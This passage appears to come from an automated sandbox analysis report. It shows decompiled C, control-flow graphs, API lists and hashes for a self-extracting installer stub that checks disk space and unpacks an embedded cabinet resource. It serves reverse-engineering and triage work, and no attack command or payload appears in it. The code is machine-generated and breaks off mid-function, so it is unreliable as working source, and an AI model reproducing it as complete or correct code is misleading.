                                                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 001A5830
                                                                                                                                                                                                                                                • Part of subcall function 001A6517: FindResourceA.KERNEL32(001A0000,000007D6,00000005), ref: 001A652A
                                                                                                                                                                                                                                                • Part of subcall function 001A6517: LoadResource.KERNEL32(001A0000,00000000,?,?,001A2EE8,00000000,001A19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 001A6538
                                                                                                                                                                                                                                                • Part of subcall function 001A6517: DialogBoxIndirectParamA.USER32(001A0000,00000000,00000547,001A19E0,00000000), ref: 001A6557
                                                                                                                                                                                                                                                • Part of subcall function 001A6517: FreeResource.KERNEL32(00000000,?,?,001A2EE8,00000000,001A19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 001A6560
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 001A5878
                                                                                                                                                                                                                                                • Part of subcall function 001A597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001A59A8
                                                                                                                                                                                                                                                • Part of subcall function 001A597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 001A59AF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                              • API String ID: 2436801531-1384155332
                                                                                                                                                                                                                                              • Opcode ID: 8d506d77e1931f79e5e796806d47addbd589c96b376f3795c3fd404ddbdbf18d
                                                                                                                                                                                                                                              • Instruction ID: 26b0069b59ecf256c967e961f73a56dca7c5a1b080c727e08bc1b0cab20accb4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d506d77e1931f79e5e796806d47addbd589c96b376f3795c3fd404ddbdbf18d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47813ABCA08A04ABDB24AB758D41BFE766F9F67300F440065F586E3591EF748DC5CA60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 324 1a597d-1a59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 1a59bb-1a59d8 call 1a44b9 call 1a6285 324->325 326 1a59dd-1a5a1b GetDiskFreeSpaceA 324->326 341 1a5c05-1a5c14 call 1a6ce0 325->341 328 1a5ba1-1a5bde memset call 1a6285 GetLastError FormatMessageA 326->328 329 1a5a21-1a5a4a MulDiv 326->329 338 1a5be3-1a5bfc call 1a44b9 SetCurrentDirectoryA 328->338 329->328 332 1a5a50-1a5a6c GetVolumeInformationA 329->332 335 1a5a6e-1a5ab0 memset call 1a6285 GetLastError FormatMessageA 332->335 336 1a5ab5-1a5aca SetCurrentDirectoryA 332->336 335->338 340 1a5acc-1a5ad1 336->340 352 1a5c02 338->352 344 1a5ae2-1a5ae4 340->344 345 1a5ad3-1a5ad8 340->345 349 1a5ae6 344->349 350 1a5ae7-1a5af8 344->350 345->344 347 1a5ada-1a5ae0 345->347 347->340 347->344 349->350 351 1a5af9-1a5afb 350->351 354 1a5afd-1a5b03 351->354 355 1a5b05-1a5b08 351->355 356 1a5c04 352->356 354->351 354->355 357 1a5b0a-1a5b1b call 1a44b9 355->357 358 1a5b20-1a5b27 355->358 356->341 357->352 360 1a5b29-1a5b33 358->360 361 1a5b52-1a5b5b 358->361 360->361 363 1a5b35-1a5b50 360->363 364 1a5b62-1a5b6d 361->364 363->364 365 1a5b6f-1a5b74 364->365 366 1a5b76-1a5b7d 364->366 367 1a5b85 365->367 368 1a5b7f-1a5b81 366->368 369 1a5b83 366->369 370 1a5b96-1a5b9f 367->370 371 1a5b87-1a5b94 call 1a268b 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                                                                                              			E001A597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				char _v788;
                                                                                                                                                                                                                                              				long _v792;
                                                                                                                                                                                                                                              				long _v796;
                                                                                                                                                                                                                                              				long _v800;
                                                                                                                                                                                                                                              				signed int _v804;
                                                                                                                                                                                                                                              				long _v808;
                                                                                                                                                                                                                                              				int _v812;
                                                                                                                                                                                                                                              				long _v816;
                                                                                                                                                                                                                                              				long _v820;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                                                                              				int _t50;
                                                                                                                                                                                                                                              				signed int _t55;
                                                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                                                              				int _t69;
                                                                                                                                                                                                                                              				signed int _t73;
                                                                                                                                                                                                                                              				signed short _t78;
                                                                                                                                                                                                                                              				signed int _t87;
                                                                                                                                                                                                                                              				signed int _t101;
                                                                                                                                                                                                                                              				int _t102;
                                                                                                                                                                                                                                              				unsigned int _t103;
                                                                                                                                                                                                                                              				unsigned int _t105;
                                                                                                                                                                                                                                              				signed int _t111;
                                                                                                                                                                                                                                              				long _t112;
                                                                                                                                                                                                                                              				signed int _t116;
                                                                                                                                                                                                                                              				CHAR* _t118;
                                                                                                                                                                                                                                              				signed int _t119;
                                                                                                                                                                                                                                              				signed int _t120;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t114 = __edi;
                                                                                                                                                                                                                                              				_t46 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                              				_v804 = __edx;
                                                                                                                                                                                                                                              				_t118 = __ecx;
                                                                                                                                                                                                                                              				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                              				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                              				if(_t50 != 0) {
                                                                                                                                                                                                                                              					_push(__edi);
                                                                                                                                                                                                                                              					_v796 = 0;
                                                                                                                                                                                                                                              					_v792 = 0;
                                                                                                                                                                                                                                              					_v800 = 0;
                                                                                                                                                                                                                                              					_v808 = 0;
                                                                                                                                                                                                                                              					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                              					__eflags = _t55;
                                                                                                                                                                                                                                              					if(_t55 == 0) {
                                                                                                                                                                                                                                              						L29:
                                                                                                                                                                                                                                              						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                              						 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                              						_t110 = 0x4b0;
                                                                                                                                                                                                                                              						L30:
                                                                                                                                                                                                                                              						__eflags = 0;
                                                                                                                                                                                                                                              						E001A44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                              						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                              						L31:
                                                                                                                                                                                                                                              						_t66 = 0;
                                                                                                                                                                                                                                              						__eflags = 0;
                                                                                                                                                                                                                                              						L32:
                                                                                                                                                                                                                                              						_pop(_t114);
                                                                                                                                                                                                                                              						goto L33;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                              					_v812 = _t69;
                                                                                                                                                                                                                                              					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                              					__eflags = _t116;
                                                                                                                                                                                                                                              					if(_t116 == 0) {
                                                                                                                                                                                                                                              						goto L29;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                              					__eflags = _t73;
                                                                                                                                                                                                                                              					if(_t73 != 0) {
                                                                                                                                                                                                                                              						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                              						_t101 =  &_v16;
                                                                                                                                                                                                                                              						_t111 = 6;
                                                                                                                                                                                                                                              						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                              						__eflags = _t119;
                                                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                                                              							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                              							__eflags = _t22;
                                                                                                                                                                                                                                              							if(_t22 == 0) {
                                                                                                                                                                                                                                              								break;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                              							__eflags = _t87;
                                                                                                                                                                                                                                              							if(_t87 == 0) {
                                                                                                                                                                                                                                              								break;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							 *_t101 = _t87;
                                                                                                                                                                                                                                              							_t101 = _t101 + 1;
                                                                                                                                                                                                                                              							_t111 = _t111 - 1;
                                                                                                                                                                                                                                              							__eflags = _t111;
                                                                                                                                                                                                                                              							if(_t111 != 0) {
                                                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _t111;
                                                                                                                                                                                                                                              						if(_t111 == 0) {
                                                                                                                                                                                                                                              							_t101 = _t101 - 1;
                                                                                                                                                                                                                                              							__eflags = _t101;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *_t101 = 0;
                                                                                                                                                                                                                                              						_t112 = 0x200;
                                                                                                                                                                                                                                              						_t102 = _v812;
                                                                                                                                                                                                                                              						_t78 = 0;
                                                                                                                                                                                                                                              						_t118 = 8;
                                                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                                                              							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                              							if(_t102 == _t112) {
                                                                                                                                                                                                                                              								break;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                              							_t78 = _t78 + 1;
                                                                                                                                                                                                                                              							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                              							if(_t78 < _t118) {
                                                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                              						if(_t78 != _t118) {
                                                                                                                                                                                                                                              							__eflags =  *0x1a9a34 & 0x00000008;
                                                                                                                                                                                                                                              							if(( *0x1a9a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                              								L20:
                                                                                                                                                                                                                                              								_t103 =  *0x1a9a38; // 0x0
                                                                                                                                                                                                                                              								_t110 =  *((intOrPtr*)(0x1a89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                              								L21:
                                                                                                                                                                                                                                              								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                              								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                              									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                              									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								if(__eflags <= 0) {
                                                                                                                                                                                                                                              									 *0x1a9124 = 0;
                                                                                                                                                                                                                                              									_t66 = 1;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t66 = E001A268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                              							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t105 =  *0x1a9a38; // 0x0
                                                                                                                                                                                                                                              							_t110 =  *((intOrPtr*)(0x1a89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x1a89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                              							_t103 = (_t105 >> 2) +  *0x1a9a38;
                                                                                                                                                                                                                                              							goto L21;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t110 = 0x4c5;
                                                                                                                                                                                                                                              						E001A44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						goto L31;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                              					 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                              					_t110 = 0x4f9;
                                                                                                                                                                                                                                              					goto L30;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t110 = 0x4bc;
                                                                                                                                                                                                                                              					E001A44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              					_t66 = 0;
                                                                                                                                                                                                                                              					L33:
                                                                                                                                                                                                                                              					return E001A6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}



































                                                                                                                                                                                                                                              0x001a597d
                                                                                                                                                                                                                                              0x001a5988
                                                                                                                                                                                                                                              0x001a598f
                                                                                                                                                                                                                                              0x001a599a
                                                                                                                                                                                                                                              0x001a59a6
                                                                                                                                                                                                                                              0x001a59a8
                                                                                                                                                                                                                                              0x001a59af
                                                                                                                                                                                                                                              0x001a59b9
                                                                                                                                                                                                                                              0x001a59dd
                                                                                                                                                                                                                                              0x001a59e4
                                                                                                                                                                                                                                              0x001a59f1
                                                                                                                                                                                                                                              0x001a59fe
                                                                                                                                                                                                                                              0x001a5a0b
                                                                                                                                                                                                                                              0x001a5a13
                                                                                                                                                                                                                                              0x001a5a19
                                                                                                                                                                                                                                              0x001a5a1b
                                                                                                                                                                                                                                              0x001a5ba1
                                                                                                                                                                                                                                              0x001a5baf
                                                                                                                                                                                                                                              0x001a5bbd
                                                                                                                                                                                                                                              0x001a5bd8
                                                                                                                                                                                                                                              0x001a5bde
                                                                                                                                                                                                                                              0x001a5be3
                                                                                                                                                                                                                                              0x001a5bec
                                                                                                                                                                                                                                              0x001a5bf0
                                                                                                                                                                                                                                              0x001a5bfc
                                                                                                                                                                                                                                              0x001a5c02
                                                                                                                                                                                                                                              0x001a5c02
                                                                                                                                                                                                                                              0x001a5c02
                                                                                                                                                                                                                                              0x001a5c04
                                                                                                                                                                                                                                              0x001a5c04
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5c04
                                                                                                                                                                                                                                              0x001a5a27
                                                                                                                                                                                                                                              0x001a5a3a
                                                                                                                                                                                                                                              0x001a5a46
                                                                                                                                                                                                                                              0x001a5a48
                                                                                                                                                                                                                                              0x001a5a4a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5a64
                                                                                                                                                                                                                                              0x001a5a6a
                                                                                                                                                                                                                                              0x001a5a6c
                                                                                                                                                                                                                                              0x001a5abc
                                                                                                                                                                                                                                              0x001a5ac2
                                                                                                                                                                                                                                              0x001a5ac9
                                                                                                                                                                                                                                              0x001a5aca
                                                                                                                                                                                                                                              0x001a5aca
                                                                                                                                                                                                                                              0x001a5acc
                                                                                                                                                                                                                                              0x001a5acc
                                                                                                                                                                                                                                              0x001a5acf
                                                                                                                                                                                                                                              0x001a5ad1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5ad3
                                                                                                                                                                                                                                              0x001a5ad6
                                                                                                                                                                                                                                              0x001a5ad8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5ada
                                                                                                                                                                                                                                              0x001a5adc
                                                                                                                                                                                                                                              0x001a5add
                                                                                                                                                                                                                                              0x001a5add
                                                                                                                                                                                                                                              0x001a5ae0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5ae0
                                                                                                                                                                                                                                              0x001a5ae2
                                                                                                                                                                                                                                              0x001a5ae4
                                                                                                                                                                                                                                              0x001a5ae6
                                                                                                                                                                                                                                              0x001a5ae6
                                                                                                                                                                                                                                              0x001a5ae6
                                                                                                                                                                                                                                              0x001a5ae9
                                                                                                                                                                                                                                              0x001a5aeb
                                                                                                                                                                                                                                              0x001a5af0
                                                                                                                                                                                                                                              0x001a5af6
                                                                                                                                                                                                                                              0x001a5af8
                                                                                                                                                                                                                                              0x001a5af9
                                                                                                                                                                                                                                              0x001a5af9
                                                                                                                                                                                                                                              0x001a5afb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5afd
                                                                                                                                                                                                                                              0x001a5aff
                                                                                                                                                                                                                                              0x001a5b00
                                                                                                                                                                                                                                              0x001a5b03
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5b03
                                                                                                                                                                                                                                              0x001a5b05
                                                                                                                                                                                                                                              0x001a5b08
                                                                                                                                                                                                                                              0x001a5b20
                                                                                                                                                                                                                                              0x001a5b27
                                                                                                                                                                                                                                              0x001a5b52
                                                                                                                                                                                                                                              0x001a5b52
                                                                                                                                                                                                                                              0x001a5b5b
                                                                                                                                                                                                                                              0x001a5b62
                                                                                                                                                                                                                                              0x001a5b6b
                                                                                                                                                                                                                                              0x001a5b6d
                                                                                                                                                                                                                                              0x001a5b76
                                                                                                                                                                                                                                              0x001a5b7d
                                                                                                                                                                                                                                              0x001a5b83
                                                                                                                                                                                                                                              0x001a5b7f
                                                                                                                                                                                                                                              0x001a5b7f
                                                                                                                                                                                                                                              0x001a5b7f
                                                                                                                                                                                                                                              0x001a5b6f
                                                                                                                                                                                                                                              0x001a5b72
                                                                                                                                                                                                                                              0x001a5b72
                                                                                                                                                                                                                                              0x001a5b85
                                                                                                                                                                                                                                              0x001a5b98
                                                                                                                                                                                                                                              0x001a5b9e
                                                                                                                                                                                                                                              0x001a5b87
                                                                                                                                                                                                                                              0x001a5b8f
                                                                                                                                                                                                                                              0x001a5b8f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5b85
                                                                                                                                                                                                                                              0x001a5b29
                                                                                                                                                                                                                                              0x001a5b33
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5b35
                                                                                                                                                                                                                                              0x001a5b48
                                                                                                                                                                                                                                              0x001a5b4a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5b4a
                                                                                                                                                                                                                                              0x001a5b0f
                                                                                                                                                                                                                                              0x001a5b16
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5b16
                                                                                                                                                                                                                                              0x001a5a7c
                                                                                                                                                                                                                                              0x001a5a8a
                                                                                                                                                                                                                                              0x001a5aa5
                                                                                                                                                                                                                                              0x001a5aab
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a59bb
                                                                                                                                                                                                                                              0x001a59c0
                                                                                                                                                                                                                                              0x001a59c7
                                                                                                                                                                                                                                              0x001a59d1
                                                                                                                                                                                                                                              0x001a59d6
                                                                                                                                                                                                                                              0x001a5c05
                                                                                                                                                                                                                                              0x001a5c14
                                                                                                                                                                                                                                              0x001a5c14

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001A59A8
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(?), ref: 001A59AF
                                                                                                                                                                                                                                              • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 001A5A13
                                                                                                                                                                                                                                              • MulDiv.KERNEL32(?,?,00000400), ref: 001A5A40
                                                                                                                                                                                                                                              • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 001A5A64
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 001A5A7C
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 001A5A98
                                                                                                                                                                                                                                              • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 001A5AA5
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 001A5BFC
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
                                                                                                                                                                                                                                                • Part of subcall function 001A6285: GetLastError.KERNEL32(001A5BBC), ref: 001A6285
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4237285672-0
                                                                                                                                                                                                                                              • Opcode ID: 992b8b569f0d508abc62d11d48171e83d67bbc0c56c43a955c9a92dd5da3a5a6
                                                                                                                                                                                                                                              • Instruction ID: 3a9243b2b3f26a3686676053a5afa3fd0165c43124c4862ef04ad61e8c68ee46
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 992b8b569f0d508abc62d11d48171e83d67bbc0c56c43a955c9a92dd5da3a5a6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E971B3B5A0420CAFDB16DF24CC85BFB77AEEB4A314F4440AAF50696540DB708E85CB20
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 374 1a4fe0-1a501a call 1a468f FindResourceA LoadResource LockResource 377 1a5020-1a5027 374->377 378 1a5161-1a5163 374->378 379 1a5029-1a5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 1a5057-1a505e call 1a4efd 377->380 379->380 383 1a507c-1a50b4 380->383 384 1a5060-1a5077 call 1a44b9 380->384 389 1a50e8-1a5104 call 1a44b9 383->389 390 1a50b6-1a50da 383->390 388 1a5107-1a510e 384->388 391 1a511d-1a511f 388->391 392 1a5110-1a5117 FreeResource 388->392 398 1a5106 389->398 390->398 402 1a50dc 390->402 394 1a513a-1a5141 391->394 395 1a5121-1a5127 391->395 392->391 400 1a515f 394->400 401 1a5143-1a514a 394->401 395->394 399 1a5129-1a5135 call 1a44b9 395->399 398->388 399->394 400->378 401->400 404 1a514c-1a5159 SendMessageA 401->404 405 1a50e3-1a50e6 402->405 404->400 405->389 405->398
                                                                                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                                                                                              			E001A4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* _t8;
                                                                                                                                                                                                                                              				struct HWND__* _t9;
                                                                                                                                                                                                                                              				int _t10;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				struct HWND__* _t24;
                                                                                                                                                                                                                                              				struct HWND__* _t27;
                                                                                                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                                                                              				int _t34;
                                                                                                                                                                                                                                              				CHAR* _t36;
                                                                                                                                                                                                                                              				int _t37;
                                                                                                                                                                                                                                              				intOrPtr _t47;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t33 = __edi;
                                                                                                                                                                                                                                              				_t36 = "CABINET";
                                                                                                                                                                                                                                              				 *0x1a9144 = E001A468F(_t36, 0, 0);
                                                                                                                                                                                                                                              				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                              				 *0x1a9140 = _t8;
                                                                                                                                                                                                                                              				if(_t8 == 0) {
                                                                                                                                                                                                                                              					return _t8;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t9 =  *0x1a8584; // 0x0
                                                                                                                                                                                                                                              				if(_t9 != 0) {
                                                                                                                                                                                                                                              					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                              					ShowWindow(GetDlgItem( *0x1a8584, 0x841), 5);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t10 = E001A4EFD(0, 0);
                                                                                                                                                                                                                                              				if(_t10 != 0) {
                                                                                                                                                                                                                                              					__imp__#20(E001A4CA0, E001A4CC0, E001A4980, E001A4A50, E001A4AD0, E001A4B60, E001A4BC0, 1, 0x1a9148, _t33);
                                                                                                                                                                                                                                              					_t34 = _t10;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						L8:
                                                                                                                                                                                                                                              						_t29 =  *0x1a9148; // 0x0
                                                                                                                                                                                                                                              						_t24 =  *0x1a8584; // 0x0
                                                                                                                                                                                                                                              						E001A44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						_t37 = 0;
                                                                                                                                                                                                                                              						L9:
                                                                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__imp__#22(_t34, "*MEMCAB", 0x1a1140, 0, E001A4CD0, 0, 0x1a9140); // executed
                                                                                                                                                                                                                                              					_t37 = _t10;
                                                                                                                                                                                                                                              					if(_t37 == 0) {
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                              					if(_t10 != 0) {
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L8;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t27 =  *0x1a8584; // 0x0
                                                                                                                                                                                                                                              					E001A44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					_t37 = 0;
                                                                                                                                                                                                                                              					L10:
                                                                                                                                                                                                                                              					_t12 =  *0x1a9140; // 0x0
                                                                                                                                                                                                                                              					if(_t12 != 0) {
                                                                                                                                                                                                                                              						FreeResource(_t12);
                                                                                                                                                                                                                                              						 *0x1a9140 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t37 == 0) {
                                                                                                                                                                                                                                              						_t47 =  *0x1a91d8; // 0x0
                                                                                                                                                                                                                                              						if(_t47 == 0) {
